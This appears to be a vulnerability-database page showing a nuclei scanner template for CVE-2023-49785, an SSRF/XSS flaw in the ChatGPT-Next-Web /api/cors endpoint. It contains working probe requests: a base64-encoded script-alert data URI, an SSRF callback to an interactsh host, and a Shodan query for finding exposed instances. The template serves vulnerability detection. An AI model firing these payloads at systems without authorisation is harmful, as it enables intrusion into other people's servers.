Lucene search
K

ChatGPT-Next-Web - SSRF/XSS

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 540 Views

ChatGPT-Next-Web SSRF/XSS vulnerability, CVE-2023-49785, critical severity, fix by not exposing to the Interne

Related
Refs
Code
id: CVE-2023-49785

info:
  name: ChatGPT-Next-Web - SSRF/XSS
  author: high
  severity: critical
  description: |
    Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web
  impact: |
    Unauthenticated attackers can exploit SSRF vulnerabilities through the /api/cors endpoint to access internal network resources and inject malicious JavaScript for cross-site scripting attacks.
  remediation: |
    Do not expose to the Internet
  reference:
    - https://www.horizon3.ai/attack-research/attack-blogs/nextchat-an-ai-chatbot-that-lets-you-talk-to-anyone-you-want-to/
    - https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-49785
    cwe-id: CWE-79
    epss-score: 0.83163
    epss-percentile: 0.99638
  metadata:
    verified: true
    max-request: 2
    shodan-query: "title:NextChat,\"ChatGPT Next Web\""
  tags: cve,cve2023,ssrf,xss,chatgpt,nextchat,vkev,vuln,ai

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23"
      - "{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - contains(body_1, "<script>alert(document.domain)</script>")
          - contains(header_1, "text/html")
        condition: and

      - type: dsl
        dsl:
          - contains(header_2,'X-Interactsh-Version')
          - contains(interactsh_protocol_2,'dns')
        condition: and
# digest: 4a0a00473045022100c62ea88c1448995bbfa2a8325f81b412c8fd324e0c8d3065819dc5a7e324a62a02201ed401780d6ec056f0851d7e05e8441d4f8fd193edafa45b24030eaa08340fc3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.1 - 9.8
EPSS0.83163
SSVC
540